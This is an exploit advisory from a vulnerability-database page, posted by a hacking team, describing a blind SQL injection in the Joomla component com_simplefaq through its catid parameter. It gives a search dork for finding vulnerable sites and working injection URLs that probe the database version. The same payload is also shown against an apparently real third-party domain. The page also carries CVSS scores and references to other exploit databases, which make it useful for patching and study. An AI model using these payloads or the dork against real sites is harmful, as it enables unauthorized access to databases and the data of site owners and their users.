Joomla Component com_simplefaq (catid) Blind Sql Injection Vulnerability

2010.02.16
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Joomla Component com_simplefaq (catid) Blind Sql Injection Vulnerability ========================================================================= ########################################### .:. Author : AtT4CKxT3rR0r1ST .:. Team : Sec Attack Team .:. Email : F.Hack@w.cn .:. Home : www.sec-attack.com/vb .:. Script : Joomla Component com_simplefaq .:. Script Download: http://www.parkviewconsultants.com/component/option,com_mosipn/page,free/ .:. Bug Type : Blind Sql Injection .:. Dork : inurl:"com_simplefaq" .:. Date : 30/1/2010 ############################################# ===[ Exploit ]=== www.site.com/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70[Blind Injection]&page=1#FAQ5 www.site.com/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=5&page=1#FAQ5 >>>> True www.site.com/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=4&page=1#FAQ5 >>>> False ===[ Example ]=== http://anyunit.com/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=5&page=1#FAQ5 >>>> True http://anyunit.com/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=4&page=1#FAQ5 >>>> False ############################################# Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack ________________________________ Hotmail: Trusted email with Microsoft?s powerful SPAM protection. Sign up now.<https://signup.live.com/signup.aspx?id=60969>

References:

http://xforce.iss.net/xforce/xfdb/56028
http://www.securityfocus.com/bid/38015
http://www.exploit-db.com/exploits/11294
http://packetstormsecurity.org/1001-exploits/joomlasimplefaq-sql.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top